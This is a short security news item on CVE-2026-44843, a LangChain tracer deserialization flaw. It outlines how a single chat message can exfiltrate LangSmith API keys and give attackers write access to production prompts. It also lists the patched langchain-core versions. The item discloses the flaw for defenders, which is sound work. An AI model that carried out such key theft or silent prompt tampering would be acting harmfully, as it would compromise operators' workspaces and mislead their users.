CVE-2026-44843: LangChain Flaw Lets Single Chat Message Steal API Keys and Hijack AI Prompts
A single chat message is all it takes. CVE-2026-44843, a vulnerability in LangChain's framework, enables attackers to steal credentials and hijack AI application behavior through a malicious payload delivered via chat interface. The flaw resides in LangChain's tracer component, which deserializes untrusted data, granting remote attackers administrative access to a victim's LangSmith workspace.
The attack chain exploits LangChain's deserialization handling. When a malicious payload is processed by the tracer, it can instantiate classes such as HubRunnable, triggering outbound network requests that exfiltrate LangSmith API keys from the server's environment variables. Once an attacker obtains a valid API key, they gain write access to production prompts—the core instructions governing AI application behavior. This creates a persistent compromise vector: modified prompts can silently redirect outputs, inject malicious content, or manipulate decision-making logic without triggering conventional security alerts.
The vulnerability has been patched in langchain-core versions 1.3.3 and 0.3.85, and organizations using LangChain are advised to upgrade to prevent exploitation. The disclosure underscores a broader risk in AI infrastructure: deserialization vulnerabilities in ML frameworks can cascade into full workspace compromise, turning developer tooling into attack surfaces. With LangChain widely adopted for building LLM-powered applications, the potential exposure spans enterprises, startups, and research institutions relying on the framework for production AI systems.